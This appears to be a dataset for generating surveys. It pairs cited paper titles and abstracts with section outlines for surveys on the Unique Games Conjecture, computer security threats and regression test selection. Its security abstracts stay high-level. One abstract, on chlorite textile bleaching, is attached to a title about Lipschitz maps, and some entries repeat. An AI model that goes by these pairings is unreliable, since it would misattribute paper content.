$(1-\epsilon)$, what's the best they can do in the repeated game? We improve earlier results of [R. Raz, SIAM J. Comput., 27 (1998), pp. 763-803] and [T. Holenstein, Theory Comput., 5 (2009), pp. 141-172], who showed that the players cannot win all copies in the repeated game with probability better than $(1-\epsilon/2)^{\Omega(n\epsilon^2/c)}$ (here $c$ is the length of the answers in the game), in the following ways: (i) We show that the probability of winning all copies is $(1-\epsilon/2)^{\Omega(\epsilon n)}$ as long as the game is a “projection game,” the type of game most commonly used in hardness of approximation results. (ii) We prove a concentration bound for parallel repetition (of general games) showing that for any constant $0 0$, there exists an alphabet size $M(\epsilon)$ for which it is NP-hard to distinguish a unique game with alphabet size $M$ in which a $(1-\epsilon^2)$ fraction of the constraints can be satisfied from one in which a $(1-\epsilon f(1/\epsilon))$ fraction of the constraints can be satisfied. --- paper_title: Approximation Resistant Predicates from Pairwise Independence paper_content: We study the approximability of predicates on k variables from a domain [q], and give a new sufficient condition for such predicates to be approximation resistant under the Unique Games Conjecture. ... --- paper_title: Understanding Parallel Repetition Requires Understanding Foams paper_content: Motivated by the study of parallel repetition and also by the unique games conjecture, we investigate the value of the "odd cycle games" under parallel repetition. Using tools from discrete harmonic analysis, we show that after d rounds on the cycle of length m, the value of the game is at most 1-(1/m)ldrOmega macr(radicd) (for dlesm2, say). This beats the natural barrier of 1-Theta(1/m)2 ldrd for Raz-style proofs and also the SDP bound of Feige-Lovasz; however, it just barely fails to have implications for unique games. On the other hand, we also show that improving our bound would require proving nontrivial lower bounds on the surface area of high-dimensional foams. Specifically, one would need to answer: what is the least surface area of a cell that tiles Rd by the lattice Zd? --- paper_title: A Counterexample to Strong Parallel Repetition paper_content: The parallel repetition theorem states that, for any two-prover game with value $1-\epsilon$ (for, say, $\epsilon\leq1/2$), the value of the game repeated in parallel $n$ times is at most $(1-\epsilon^c)^{\Omega(n/s)}$, where $s$ is the answer's length (of the original game) and $c$ is a universal constant [R. Raz, SIAM J. Comput., 27 (1998), pp. 763-803]. Several researchers asked whether this bound could be improved to $(1-\epsilon)^{\Omega(n/s)}$; this question is usually referred to as the strong parallel repetition problem. We show that the answer to this question is negative. More precisely, we consider the odd cycle game of size $m$, a two-prover game with value $1-1/2m$. We show that the value of the odd cycle game repeated in parallel $n$ times is at least $1-(1/m)\cdot O(\sqrt{n})$. This implies that, for large enough $n$ (say, $n\geq\Omega(m^2)$), the value of the odd cycle game repeated in parallel $n$ times is at least $(1-1/4m^2)^{O(n)}$. Thus the following hold. 1. For parallel repetition of general games, the bounds of $(1-\epsilon^c)^{\Omega(n/s)}$ given in [R. Raz, SIAM J. Comput., 27 (1998), pp. 763-803; T. Holenstein, in Proceedings of STOC 2002, ACM, New York, 2002, pp. 767-775] are of the right form, up to determining the exact value of the constant $c\geq2$. 2. For parallel repetition of XOR games, unique games, and projection games, the bounds of $(1-\epsilon^2)^{\Omega(n)}$ given in [U. Feige, G. Kindler, and R. O'Donnell, in Proceedings of CCC 2007, IEEE Computer Society, Washington, DC, 2007, pp. 179-192] (for XOR games) and in [A. Rao, in Proceedings of STOC 2008, ACM, New York, 2008, pp. 1-10] (for unique and projection games) are tight. 3. For parallel repetition of the odd cycle game, the bound of $1-(1/m)\cdot\tilde{\Omega}(\sqrt{n})$ given in [U. Feige, G. Kindler, and R. O'Donnell, in Proceedings of CCC 2007, IEEE Computer Society, Washington, DC, 2007, pp. 179-192] is almost tight. A major motivation for the recent interest in the strong parallel repetition problem is that a strong parallel repetition theorem would have implied that the unique game conjecture is equivalent to the NP hardness of distinguishing between instances of Max-Cut that are at least $1-\epsilon^2$ satisfiable from instances that are at most $1-(2/\pi)\cdot\epsilon$ satisfiable. Our results suggest that this cannot be proved just by improving the known bounds on parallel repetition. --- paper_title: Consequences and limits of nonlocal strategies paper_content: This paper investigates the powers and limitations of quantum entanglement in the context of cooperative games of incomplete information. We give several examples of such nonlocal games where strategies that make use of entanglement outperform all possible classical strategies. One implication of these examples is that entanglement can profoundly affect the soundness property of two-prover interactive proof systems. We then establish limits on the probability with which strategies making use of entanglement can win restricted types of nonlocal games. These upper bounds may be regarded as generalizations of Tsirelson-type inequalities, which place bounds on the extent to which quantum information can allow for the violation of Bell inequalities. We also investigate the amount of entanglement required by optimal and nearly optimal quantum strategies for some games. --- paper_title: Rounding Parallel Repetitions of Unique Games paper_content: We show a connection between the semidefinite relaxation of unique games and their behavior under parallel repetition. Specifically,denoting by val(G) the value of a two-prover unique game G, andby sdpval(G) the value of a natural semidefinite program to approximate val(G), we prove that for every l epsi N, if sdpval(G) ges 1-delta, then val(Gl) ges 1-radicsldelta. Here, Gl denotes the l-fold parallel repetition of G, and s=O(log(k/delta)), where k denotes the alphabet size of the game. For the special case where G is an XOR game (i.e., k=2), we obtain the same bound but with s as an absolute constant. Our bounds on s are optimal up to a factor of O(log(1/delta)). For games with a significant gap between the quantities val(G) and sdpval(G), our result implies that val(Gl) may be much larger than val(G)l, giving a counterexample to the strong parallel repetition conjecture. In a recent breakthrough, Raz (FOCS'08) has shown such an example using the max-cut game on oddcycles. Our results are based on a generalization of his techniques. --- paper_title: Inapproximability Results for Sparsest Cut, Optimal Linear Arrangement, and Precedence Constrained Scheduling paper_content: We consider (uniform) sparsest cut, optimal linear arrangement and the precedence constrained scheduling problem 1 |prec| SigmawjCj-So far, these three notorious NP-hard problems have resisted all attempts to prove inapproximability results. We show that they have no polynomial time approximation scheme (PTAS), unless NP-complete pmblems can be solved in randomized subexponential time. Furthermore, we prove that the scheduling problem is as-hard to approximate as vertex cover when the so-called fixed cost, that is present in all feasible solutions, is subtracted from the objective function. --- paper_title: Sharp kernel clustering algorithms and their associated Grothendieck inequalities paper_content: In the kernel clustering problem we are given a (large) $n\times n$ symmetric positive semidefinite matrix $A=(a_{ij})$ with $\sum_{i=1}^n\sum_{j=1}^n a_{ij}=0$ and a (small) $k\times k$ symmetric positive semidefinite matrix $B=(b_{ij})$. The goal is to find a partition $\{S_1,...,S_k\}$ of $\{1,... n\}$ which maximizes $ \sum_{i=1}^k\sum_{j=1}^k (\sum_{(p,q)\in S_i\times S_j}a_{pq})b_{ij}$. We design a polynomial time approximation algorithm that achieves an approximation ratio of $\frac{R(B)^2}{C(B)}$, where $R(B)$ and $C(B)$ are geometric parameters that depend only on the matrix $B$, defined as follows: if $b_{ij} =$ is the Gram matrix representation of $B$ for some $v_1,...,v_k\in \R^k$ then $R(B)$ is the minimum radius of a Euclidean ball containing the points $\{v_1, ..., v_k\}$. The parameter $C(B)$ is defined as the maximum over all measurable partitions $\{A_1,...,A_k\}$ of $\R^{k-1}$ of the quantity $\sum_{i=1}^k\sum_{j=1}^k b_{ij}$, where for $i\in \{1,...,k\}$ the vector $z_i\in \R^{k-1}$ is the Gaussian moment of $A_i$, i.e., $z_i=\frac{1}{(2\pi)^{(k-1)/2}}\int_{A_i}xe^{-\|x\|_2^2/2}dx$. We also show that for every $\eps>0$, achieving an approximation guarantee of $(1-\e)\frac{R(B)^2}{C(B)}$ is Unique Games hard. --- paper_title: The Unique Games Conjecture, Integrality Gap for Cut Problems and Embeddability of Negative Type Metrics into ℓ1 paper_content: In this paper, we disprove a conjecture of Goemans and Linial; namely, that every negative type metric embeds into $\ell_1$ with constant distortion. We show that for an arbitrarily small constant $\delta> 0$, for all large enough $n$, there is an $n$-point negative type metric which requires distortion at least $(\log\log n)^{1/6-\delta}$ to embed into $\ell_1.$ ::: Surprisingly, our construction is inspired by the Unique Games Conjecture (UGC) of Khot, establishing a previously unsuspected connection between probabilistically checkable proof systems (PCPs) and the theory of metric embeddings. We first prove that the UGC implies a super-constant hardness result for the (non-uniform) Sparsest Cut problem. Though this hardness result relies on the UGC, we demonstrate, nevertheless, that the corresponding PCP reduction can be used to construct an "integrality gap instance" for Sparsest Cut. Towards this, we first construct an integrality gap instance for a natural SDP relaxation of Unique Games. Then we "simulate" the PCP reduction and "translate" the integrality gap instance of Unique Games to an integrality gap instance of Sparsest Cut. This enables us to prove a $(\log \log n)^{1/6-\delta}$ integrality gap for Sparsest Cut, which is known to be equivalent to the metric embedding lower bound. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of /spl alpha//sub cw/+ /spl epsi/, for all /spl epsi/ > 0, where /spl alpha//sub cw/ denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). /spl alpha//sub cw/ /spl ap/ .878567. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem. The same two conjectures also imply that it is NP-hard to (/spl beta/ + /spl epsi/)-approximate MAX-2SAT, where /spl beta/ /spl ap/ .943943 is the minimum of (2 + (2//spl pi/) /spl theta/)/(3 - cos(/spl theta/)) on (/spl pi//2, /spl pi/). Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness -then they have (/spl alpha//sub GW/-/spl epsi/)- and (/spl beta/ - /spl epsi/)-approximation algorithms, respectively. Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to (3/4 + 1/(2/spl pi/) + /spl epsi/)-approximate (/spl ap/ .909155), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: On the integrality ratio of semidefinite relaxations of MAX CUT paper_content: MAX CUT is the problem of partitioning the vertices of a graph into two sets, maximizing the number of edges joining these sets. This problem is NP-hard. Goemans and Williamson proposed an algorithm that first uses a semidefinite programming relaxation of MAX CUT to embed the vertices of the graph on the surface of an n dimensional sphere, and then uses a random hyperplane to cut the sphere in two, giving a cut of the graph. They show that the expected number of edges in the random cut is at least α \cdot sdp, where α \simeq 0.87856 and sdp is the value of the semidefinite program. This manuscript shows the following results: 1. The integrality ratio of the semidefinite program is α. The previously known bound on theintegrality ratio was roughly 0.8845. 2. In the presence of the so called “triangle constraints”, the integrality ratio is no better than roughly 0.891. The previously known bound was above 0.95. --- paper_title: Graph expansion and the unique games conjecture paper_content: The edge expansion of a subset of vertices S ⊆ V in a graph G measures the fraction of edges that leave S. In a d-regular graph, the edge expansion/conductance Φ(S) of a subset S ⊆ V is defined as Φ(S) = (|E(S, V\S)|)/(d|S|). Approximating the conductance of small linear sized sets (size δ n) is a natural optimization question that is a variant of the well-studied Sparsest Cut problem. However, there are no known algorithms to even distinguish between almost complete edge expansion (Φ(S) = 1-ε), and close to 0 expansion. In this work, we investigate the connection between Graph Expansion and the Unique Games Conjecture. Specifically, we show the following: We show that a simple decision version of the problem of approximating small set expansion reduces to Unique Games. Thus if approximating edge expansion of small sets is hard, then Unique Games is hard. Alternatively, a refutation of the UGC will yield better algorithms to approximate edge expansion in graphs. This is the first non-trivial "reverse" reduction from a natural optimization problem to Unique Games. Under a slightly stronger UGC that assumes mild expansion of small sets, we show that it is UG-hard to approximate small set expansion. On instances with sufficiently good expansion of small sets, we show that Unique Games is easy by extending the techniques of [4]. --- paper_title: Expander flows, geometric embeddings and graph partitioning paper_content: We give a O(slog n)-approximation algorithm for the sparsest cut, edge expansion, balanced separator, and graph conductance problems. This improves the O(log n)-approximation of Leighton and Rao (1988). We use a well-known semidefinite relaxation with triangle inequality constraints. Central to our analysis is a geometric theorem about projections of point sets in Rd, whose proof makes essential use of a phenomenon called measure concentration. We also describe an interesting and natural “approximate certificate” for a graph's expansion, which involves embedding an n-node expander in it with appropriate dilation and congestion. We call this an expander flow. --- paper_title: ON THE HARDNESS OF APPROXIMATING MULTICUT AND SPARSEST-CUT paper_content: We show that the Multicut, Sparsest-Cut, and Min-2CNF ? Deletion problems are NP-hard to approximate within every constant factor, assuming the Unique Games Conjecture of Khot (2002). A quantitatively stronger version of the conjecture implies an inapproximability factor of $$\Omega(\sqrt{\log \log n}).$$ --- paper_title: DIFFERENTIATING MAPS INTO L 1 , AND THE GEOMETRY OF BV FUNCTIONS paper_content: This is one of a series of papers examining the interplay between differentiation theory for Lipschitz maps, X-->V, and bi-Lipschitz nonembeddability, where X is a metric measure space and V is a Banach space. Here, we consider the case V=L^1 where differentiability fails. ::: We establish another kind of differentiability for certain X, including R^n and H, the Heisenberg group with its Carnot-Cartheodory metric. It follows that H does not bi-Lipschitz embed into L^1, as conjectured by J. Lee and A. Naor. When combined with their work, this provides a natural counter example to the Goemans-Linial conjecture in theoretical computer science; the first such counterexample was found by Khot-Vishnoi. A key ingredient in the proof of our main theorem is a new connection between Lipschitz maps to L^1 and functions of bounded variation, which permits us to exploit recent work on the structure of BV functions on the Heisenberg group. --- paper_title: Finite metric spaces: combinatorics, geometry and algorithms paper_content: In the last several years a number of very interesting results were proved about finite metric spaces. Some of this work is motivated by practical considerations: Large data sets (coming e.g. from computational molecular biology, brain research or data mining) can be viewed as large metric spaces that should be analyzed (e.g. correctly clustered).On the other hand, these investigations connect to some classical areas of geometry - the asymptotic theory of finite-dimensional normed spaces and differential geometry. Finally, the metric theory of finite graphs has proved very useful in the study of graphs per se and the design of approximation algorithms for hard computational problems. In this talk I will try to explain some of the results and review some of the emerging new connections and the many fascinating open problems in this area. --- paper_title: Semidefinite Programming in Combinatorial Optimization paper_content: We discuss the use of semidefinite programming for combinatorial optimization problems. The main topics covered include (i) the Lovasz theta function and its applications to stable sets, perfect graphs, and coding theory, (ii) the automatic generation of strong valid inequalities, (iii) the maximum cut problem and related problems, and (iv) the embedding of finite metric spaces and its relationship to the sparsest cut problem. --- paper_title: Integrality Gaps for Strong SDP Relaxations of UNIQUE GAMES paper_content: With the work of Khot and Vishnoi (FOCS 2005) as a starting point, we obtain integrality gaps for certain strong SDP relaxations of unique games. Specifically, we exhibit a gap instance for the basic semidefinite program strengthened by all valid linear inequalities on the inner products of up to $\exp(\Omega(\log\log~n)^{1/4})$ vectors. For stronger relaxations obtained from the basic semidefinite program by $R$ rounds of Sherali--Adams lift-and-project, we prove a unique games integrality gap for $R = \Omega(\log\log~n)^{1/4}$.By composing these SDP gaps with UGC-hardness reductions, the above results imply corresponding integrality gaps for every problem for which a UGC-based hardness is known. Consequently, this work implies that including any valid constraints on up to$\exp(\Omega(\log\log~n)^{1/4})$ vectors to natural semidefinite program, does not improve the approximation ratio for any problem in the following classes: constraint satisfaction problems, ordering constraint satisfaction problems and metric labeling problems over constant-size metrics. We obtain similar SDP integrality gaps for balanced separator, building on Devanur et al. (STOC 2006). We also exhibit, for explicit constants $\gamma, \delta ≫ 0$, an n-point negative-type metric which requires distortion $\Omega(\log\log n)^{\gamma}$ to embed into$\ell_1$, although all its subsets of size$\exp(\Omega(\log\log~n)^{\delta})$ embed isometrically into $\ell_1$. --- paper_title: Lp metrics on the Heisenberg group and the Goemans-Linial conjecture paper_content: We prove that the function d : \mathbb{R}^3 \times \mathbb{R}^3 \to [0,\infty ) given by d\left( {(x,y,z),(t,u,v)} \right)= \left( {[((t - x)^2 + (u - y)^2 )^2 + (v - z + 2xu - 2yt)^2 ]^{\frac{1} {2}} + (t - x)^2 + (u - y)^2 } \right)^{\frac{1} {2}} . is a metric on \mathbb{R}^3 such that (\mathbb{R}^3, \sqrt d ) is isometric to a subset of Hilbert space, yet (\mathbb{R}^3, d) does not admit a bi-Lipschitz embedding into L_1. This yields a new simple counter example to the Goemans-Linial conjecture on the integrality gap of the semidefinite relaxation of the Sparsest Cut problem. The metric above is doubling, and hence has a padded stochastic decomposition at every scale. We also study the L_p version of this problem, and obtain a counter example to a natural generalization of a classical theorem of Bretagnolle, Dacunha-Castelle and Krivine (of which the Goemans-Linial conjecture is a particular case). Our methods involve Fourier analytic techniques, and a recent breakthrough of Cheeger and Kleiner, together with classical results of Pansu on the differentiability of Lipschitz functions on the Heisenberg group. --- paper_title: The Unique Games Conjecture, Integrality Gap for Cut Problems and Embeddability of Negative Type Metrics into ℓ1 paper_content: In this paper, we disprove a conjecture of Goemans and Linial; namely, that every negative type metric embeds into $\ell_1$ with constant distortion. We show that for an arbitrarily small constant $\delta> 0$, for all large enough $n$, there is an $n$-point negative type metric which requires distortion at least $(\log\log n)^{1/6-\delta}$ to embed into $\ell_1.$ ::: Surprisingly, our construction is inspired by the Unique Games Conjecture (UGC) of Khot, establishing a previously unsuspected connection between probabilistically checkable proof systems (PCPs) and the theory of metric embeddings. We first prove that the UGC implies a super-constant hardness result for the (non-uniform) Sparsest Cut problem. Though this hardness result relies on the UGC, we demonstrate, nevertheless, that the corresponding PCP reduction can be used to construct an "integrality gap instance" for Sparsest Cut. Towards this, we first construct an integrality gap instance for a natural SDP relaxation of Unique Games. Then we "simulate" the PCP reduction and "translate" the integrality gap instance of Unique Games to an integrality gap instance of Sparsest Cut. This enables us to prove a $(\log \log n)^{1/6-\delta}$ integrality gap for Sparsest Cut, which is known to be equivalent to the metric embedding lower bound. --- paper_title: On the differentiation of Lipschitz maps from metric measure spaces to Banach spaces paper_content: A sodium chlorite bath for the bleaching of textile fibers, e.g. cotton, is activated by one or more bisulfite derivatives of an organic-reducing compound having one or more aldehyde or ketone functional groups and which are capable of forming bisulfitic combination addition compounds with an alkali bisulfite. Such activators have been found to be effective in bringing about the progressive decomposition of the sodium chlorite of the bath and hence controlled bleaching at relatively low temperatures of the sodium chlorite bath. --- paper_title: L_1 embeddings of the Heisenberg group and fast estimation of graph isoperimetry paper_content: We survey connections between the theory of bi-Lipschitz embeddings and the Sparsest Cut Problem in combinatorial optimization. The story of the Sparsest Cut Problem is a striking example of the deep interplay between analysis, geometry, and probability on the one hand, and computational issues in discrete mathematics on the other. We explain how the key ideas evolved over the past 20 years, emphasizing the interactions with Banach space theory, geometric measure theory, and geometric group theory. As an important illustrative example, we shall examine recently established connections to the the structure of the Heisenberg group, and the incompatibility of its Carnot-Carath\'eodory geometry with the geometry of the Lebesgue space $L_1$. --- paper_title: Compression bounds for Lipschitz maps from the Heisenberg group to $L_1$ paper_content: We prove a quantitative bi-Lipschitz nonembedding theorem for the Heisenberg group with its Carnot-Carath\'eodory metric and apply it to give a lower bound on the integrality gap of the Goemans-Linial semidefinite relaxation of the Sparsest Cut problem. --- paper_title: Spherical Cubes and Rounding in High Dimensions paper_content: What is the least surface area of a shape that tiles Ropfd under translations by Zopfd? Any such shape must have volume 1 and hence surface area at least that of the volume-1 ball, namely Omega(radicd). Our main result is a construction with surface area O(radicd), matching the lower bound up to a constant factor of 2radic2pi/eap3. The best previous tile known was only slightly better than the cube, having surface area on the order of d. We generalize this to give a construction that tiles Ropfd by translations of any full rank discrete lattice Lambda with surface area 2piparV-1parfb, where V is the matrix of basis vectors of Lambda, and par.parfb denotes the Frobenius norm. We show that our bounds are optimal within constant factors for rectangular lattices. Our proof is via a random tessellation process, following recent ideas of Raz in the discrete setting. Our construction gives an almost optimal noise-resistant rounding scheme to round points in Ropfd to rectangular lattice points. --- paper_title: Understanding Parallel Repetition Requires Understanding Foams paper_content: Motivated by the study of parallel repetition and also by the unique games conjecture, we investigate the value of the "odd cycle games" under parallel repetition. Using tools from discrete harmonic analysis, we show that after d rounds on the cycle of length m, the value of the game is at most 1-(1/m)ldrOmega macr(radicd) (for dlesm2, say). This beats the natural barrier of 1-Theta(1/m)2 ldrd for Raz-style proofs and also the SDP bound of Feige-Lovasz; however, it just barely fails to have implications for unique games. On the other hand, we also show that improving our bound would require proving nontrivial lower bounds on the surface area of high-dimensional foams. Specifically, one would need to answer: what is the least surface area of a cell that tiles Rd by the lattice Zd? --- paper_title: Economical toric spines via Cheeger's Inequality paper_content: Let $G_{\infty}=(C_m^d)_{\infty}$ denote the graph whose set of vertices is $\{1,..., m\}^d$, where two distinct vertices are adjacent iff they are either equal or adjacent in $C_m$ in each coordinate. Let $G_{1}=(C_m^d)_1$ denote the graph on the same set of vertices in which two vertices are adjacent iff they are adjacent in one coordinate in $C_m$ and equal in all others. Both graphs can be viewed as graphs of the $d$-dimensional torus. We prove that one can delete $O(\sqrt d m^{d-1})$ vertices of $G_1$ so that no topologically nontrivial cycles remain. This improves an $O(d^{\log_2 (3/2)}m^{d-1})$ estimate of Bollob\'as, Kindler, Leader and O'Donnell. We also give a short proof of a result implicit in a recent paper of Raz: one can delete an $O(\sqrt d/m)$ fraction of the edges of $G_{\infty}$ so that no topologically nontrivial cycles remain in this graph. Our technique also yields a short proof of a recent result of Kindler, O'Donnell, Rao and Wigderson; there is a subset of the continuous $d$-dimensional torus of surface area $O(\sqrt d)$ that intersects all nontrivial cycles. All proofs are based on the same general idea: the consideration of random shifts of a body with small boundary and no- nontrivial cycles, whose existence is proved by applying the isoperimetric inequality of Cheeger or its vertex or edge discrete analogues. --- paper_title: On Systems of Linear Equations with Two Variables per Equation paper_content: For a prime p, max-2linp is the problem of satisfying as many equations as possible from a system of linear equations modulo p, where every equation contains two variables. Hastad shows that this problem is NP-hard to approximate within a ratio of 11/12 + e for p=2, and Andersson, Engebretsen and Hastad show the same hardness of approximation ratio for p ≥ 11, and somewhat weaker results (such as 69/70) for p = 3,5,7. We prove that max-2linp is easiest to approximate when p = 2, implying for every prime p that max-2linp is NP-hard to approximate within a ratio of 11/12 + e. For large p, we prove stronger hardness of approximation results. Namely, we show that there is some universal constant δ > 0 such that it is NP-hard to approximate max-2linp within a ratio better than 1/p δ . We use our results so as to clarify some aspects of Khot’s unique games conjecture. Namely, we show that for every e > 0 it is NP-hard to approximate the value of unique games within a ratio of e. --- paper_title: Approximate Lasserre Integrality Gap for Unique Games paper_content: In this paper, we investigate whether a constant round Lasserre Semi-definite Programming (SDP) relaxation might give a good approximation to the Unique Games problem. We show that the answer is negative if the relaxation is insensitive to a sufficiently small perturbation of the constraints. Specifically, we construct an instance of Unique Games with k labels along with an approximate vector solution to t rounds of the Lasserre SDP relaxation. The SDP objective is at least 1 - e whereas the integral optimum is at most γ, and all SDP constraints are satisfied up to an accuracy of δ > 0. Here e, γ > 0 and t ∈ Z+ are arbitrary constants and k = k(e, γ) ∈ Z+. The accuracy parameter δ can bemade sufficiently small independent of parameters e, γ,t, k (but the size of the instance grows as δ gets smaller). ---
Title: On the Unique Games Conjecture (Invited Survey) Section 1: INTRODUCTION Description 1: This section introduces the Unique Games Conjecture (UGC), exploring its significance in computational complexity, algorithms, and other areas. It also mentions connections to inapproximability, discrete Fourier analysis, geometry, integrality gaps, algorithms, and parallel repetition. Section 2: Approximation Algorithms and Inapproximability Description 2: This section discusses the role of approximation algorithms in solving NP-complete problems, defining approximation factors and the impact of gap-preserving reductions. It includes subsections on the PCP Theorem and optimal inapproximability results. Section 3: The Unique Games Conjecture Description 3: This section elaborates on the Unique Games Conjecture itself, its definition, and some key observations. It also mentions the conjecture's implications and details flow to formalize certain properties. Section 4: Boolean Functions, Dictatorships, and Influence of Variables Description 4: Here, the concepts of boolean functions, dictatorship, and variable influence are described. It discusses how these play critical roles in the context of UGC-based inapproximability results. Section 5: Integrality Gaps Description 5: This section delves into how integrality gaps hinder polynomial time algorithms' ability to provide good approximate solutions. It includes a discussion on the MaxCut problem and the strategies for constructing explicit integrality gap instances. Section 6: VARIANTS OF THE Unique Games Conjecture Description 6: Different variants of the Unique Games Conjecture that are useful for proving inapproximability results are described in this section. It also discusses the equivalence of certain conjectures to the UGC. Section 7: INAPPROXIMABILITY RESULTS Description 7: This section lists main inapproximability results motivated by UGC, characterizing the exact approximation thresholds. It includes a sketch of a reduction from Unique Game problem to Min-2SAT-Deletion and discusses Raghavendra's result. Section 8: ALGORITHMS Description 8: This section summarizes algorithmic results related to UGC, detailing methods for approximating solutions to Unique Games and discussing the limitations of these algorithms. Section 9: DISCRETE FOURIER ANALYSIS Description 9: The importance of Fourier analysis in deducing inapproximability results is discussed in this section. Various Fourier analytic theorems and their applications to inapproximability are covered. Section 10: VARIANTS OF THE 2-Prover-1-Round Game Description 10: This section discusses generalizations and variants of the 2-Prover-1-Round games, including the Unique Game problem and related parallel repetition theorems. Section 11: GEOMETRY Description 11: This section explores the geometric aspects associated with the Unique Games Conjecture, discussing connections to Fourier analytic theorems and integrality gaps. It also touches on constructing foams using tiling of space. Section 12: CONCLUSION Description 12: The paper concludes with arguments for and against the Unique Games Conjecture, summarizing the current state of knowledge, its implications, and potential future research directions.
An Overview of Computer security
4
--- paper_title: Password security: a case history paper_content: This paper describes the history of the design of the password security scheme on a remotely accessed time-sharing system. The present design was the result of countering observed attempts to penetrate the system. The result is a compromise between extreme security and ease of use. --- paper_title: Cryptography and data security paper_content: From the Preface (See Front Matter for full Preface) ::: ::: Electronic computers have evolved from exiguous experimental enterprises in the 1940s to prolific practical data processing systems in the 1980s. As we have come to rely on these systems to process and store data, we have also come to wonder about their ability to protect valuable data. ::: ::: Data security is the science and study of methods of protecting data in computer and communication systems from unauthorized disclosure and modification. The goal of this book is to introduce the mathematical principles of data security and to show how these principles apply to operating systems, database systems, and computer networks. The book is for students and professionals seeking an introduction to these principles. There are many references for those who would like to study specific topics further. ::: ::: Data security has evolved rapidly since 1975. We have seen exciting developments in cryptography: public-key encryption, digital signatures, the Data Encryption Standard (DES), key safeguarding schemes, and key distribution protocols. We have developed techniques for verifying that programs do not leak confidential data, or transmit classified data to users with lower security clearances. We have found new controls for protecting data in statistical databases--and new methods of attacking these databases. We have come to a better understanding of the theoretical and practical limitations to security. --- paper_title: An Experience Using Two Covert Channel Analysis Techniques on a Real System Design paper_content: This paper examines the application of two covert channel analysis techniques to a high level design for a real system, the Honeywell Secure Ada® Target (SAT). The techniques used were a version of the noninterference model of multilevel security due to Goguen and Meseguer and the shared resource matrix method of Kemmerer. Both techniques were applied to the Gypsy Abstract Model of the SAT. The paper discusses the application of the techniques and the nature of the covert channels discovered. The relative strengths and weaknesses of the two methods are discussed and criteria for an ideal covert channel tool are developed. --- paper_title: Abstract data types and software validation paper_content: A data abstraction can be naturally specified using algebraic axioms. The virtue of these axioms is that they permit a representation-independent formal specification of a data type. An example is given which shows how to employ algebraic axioms at successive levels of implementation. The major thrust of the paper is twofold. First, it is shown how the use of algebraic axiomatizations can simplify the process of proving the correctness of an implementation of an abstract data type. Second, semi-automatic tools are described which can be used both to automate such proofs of correctness and to derive an immediate implementation from the axioms. This implementation allows for limited testing of programs at design time, before a conventional implementation is accomplished. --- paper_title: A penetration analysis of the Michigan Terminal System paper_content: The successful penetration testing of a major time-sharing operating system is described. The educational value of such a project is stressed, and principles of methodology and team organization are discussed as well as the technical conclusions from the study. --- paper_title: Password security: a case history paper_content: This paper describes the history of the design of the password security scheme on a remotely accessed time-sharing system. The present design was the result of countering observed attempts to penetrate the system. The result is a compromise between extreme security and ease of use. ---
Title: An Overview of Computer Security Section 1: THREATS Description 1: This section discusses various threats to computer security, including password guessing, spoofing, user browsing, Trojan horses, denial of service attacks, exhaustion of shared resources, and statistical database inferences. Section 2: THREAT CLASSIFICATION Description 2: This section attempts to categorize the various threats into specific types such as browsing, leakage, inference, tampering, accidental data destruction, masquerading, and denial of service. Section 3: PROTECTION MECHANISMS Description 3: This section introduces protection mechanisms used to enhance computer security, grouped into authentication mechanisms, access control, and inference control. It also covers penetration analysis, formal verification techniques, and covert channel analysis. Section 4: CONCLUSIONS Description 4: This section provides a brief overview and summarizes the topic of computer security, encouraging the reader to refer to other comprehensive sources for a more detailed study.
A Survey on Regression Test Selection Techniques on Aspect-Oriented Programming
6
--- paper_title: Composing crosscutting concerns using composition filters paper_content: It has been demonstrated that certain design concerns, such as access control, synchronization, and object interactions cannot be expressed in current OO languages as a separate software module [4, 7]. These so-called crosscutting concerns generally result in implementations scattered over multiple operations. If a crosscutting concern cannot be treated as a single module, its adaptability and reusability are likely to be reduced. A number of programming techniques have been proposed to express crosscutting concerns, for example, adaptive programming [9], AspectJ [8], Hyperspaces [10], and Composition Filters [1]. Here, we present the Composition Filters (CF) model and illustrate how it addresses evolving crosscutting concerns. --- paper_title: Aspect-oriented programming paper_content: The concept of a general purpose aspect is introduced where an aspect transparently forces cross-cutting behavior on object classes and other software entities. A reusable aspect is further described for use as part of an aspect library. --- paper_title: A Bee Colony Optimization Algorithm for Traveling Salesman Problem paper_content: A bee colony optimization (BCO) algorithm for traveling salesman problem (TSP) is presented in this paper. The BCO model is constructed algorithmically based on the collective intelligence shown in bee foraging behaviour. Experimental results comparing the proposed BCO model with some existing approaches on a set of benchmark problems are presented. --- paper_title: Empirical Studies of a Safe Regression Test Selection Technique paper_content: Regression testing is an expensive testing procedure utilized to validate modified software. Regression test selection techniques attempt to reduce the cost of regression testing by selecting a subset of a program's existing test suite. Safe regression test selection techniques select subsets that, under certain well-defined conditions, exclude no tests (from the original test suite) that if executed would reveal faults in the modified software. Many regression test selection techniques, including several safe techniques, have been proposed, but few have been subjected to empirical validation. This paper reports empirical studies on a particular safe regression test selection technique, in which the technique is compared to the alternative regression testing strategy of running all tests. The results indicate that safe regression test selection can be cost-effective, but that its costs and benefits vary widely based on a number of factors. In particular, test suite design can significantly affect the effectiveness of test selection, and coverage-based test suites may provide test selection results superior to those provided by test suites that are not coverage-based. --- paper_title: A firewall concept for both control-flow and data-flow in regression integration testing paper_content: The authors present a methodology for regression testing and function or system testers. The methodology involves regression testing of modules where dependencies due to both control flow and data flow are taken into account. The control-flow dependency is modeled as a call graph and a firewall defined to include all affected modules which must be retested. Global variables are considered as the remaining data-flow dependency to be modeled. An approach to testing and regression testing of these global variables is given, and a firewall concept for the data-flow aspect of software change is defined. > --- paper_title: An Improved Method of Selecting regression Tests for C++ Programs paper_content: This paper describes an impact analysis technique that identifies which parts should be retested after a system written in C++ is modified. We are interested in identifying the impacts of changes at the class member level by using dependency relations between class members. We try to find out which member functions need unit-level retesting and which interactions between them need integration-level retesting. To get precise 